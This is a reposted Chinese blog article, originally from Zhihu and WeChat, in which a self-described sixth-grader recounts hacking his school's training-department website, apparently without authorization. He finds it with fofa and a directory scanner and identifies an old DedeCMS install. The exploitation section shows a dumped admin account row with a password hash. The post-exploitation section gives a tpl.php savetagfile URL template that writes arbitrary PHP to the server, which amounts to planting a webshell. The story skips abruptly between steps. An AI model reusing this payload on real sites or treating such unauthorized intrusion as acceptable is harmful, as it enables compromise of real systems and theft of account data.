来自:知乎,作者:Ret2Rttr 链接:https://www.zhihu.com/people/bai-gei-a
今天这篇文章来源于知乎上一个叫R1et2Rttr的分享,作者自称是一名六年级的小学生。文章主要记录的是他针对自己学校网站的一次渗透测试,过程非常有趣,所以分享给各位读者朋友。
上周三,闲着无聊,准备上学校网站看看,想我这种Pwn狗,自然是对Web没啥希望了。。但是,我还是觉得上学校网站看看 说不定呢~ 所以 我上了学校网站 开始了渗透......
一、信息收集
无聊的我登录上了学校主站 说实在找不到啥突破点 连个能交互的地方都没有...
主站这条路死了
所以我准备从其他角度来思考这个问题。于是,我打开了fofa看看有没有啥子域名之类的。结果,hiehie 找到了学校培训部门的一个网站。
根据我对学校的理解,我们学校是肯定不可能自己做模板的 应该是运用了其他的cms来建站的,而所谓cms也就是其他的一些网站模板,具体可以是博客、商业化站之类的。打开了代理,dns开了,就用御剑扫描工具扫了一些。hhh 还真的扫描出来了!
dedecms?! 织梦csm,非常古老的的cms了。我记得可能在我出生之前可能就存在了。那么,问题就出现了。越古老的模板一般都会拥有一些通用性的漏洞。而通用性的漏洞 可能会导致网站机密性、完整性的威胁。其中,我们把这些通用性漏洞这样分开:
-
0day 指被发现但未被修复过的漏洞 -
1day 指被发现且被修复,但是由于漏洞发现时间比较早,补丁普及不完整的漏洞 -
nday 指发现且被修复的漏洞,通用性较低,因为漏洞修复已经较长时间,一般只有长期不更新的厂家才会中招** 于是,我开始了我的漏洞寻找之路。
二、漏洞利用
INSERT INTO `dede_member` VALUES('1','xxxx','admin','2604ccf7b8a4a852cxxxxxxxx','admin','xxx','100','0','0','0','[email protected]','10000','10','0','','0','','xxxxxx','','xxxxxxx79','xxxxxxx','-1');
三、后渗透
域名 + /dede/tpl.php?filename=moonsec.lib.php&action=savetagfile&content=<?php[PHP语句]?>&token=[Token值]
原文始发于微信公众号(黑客技术与网络安全):把学校的网站搞了!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论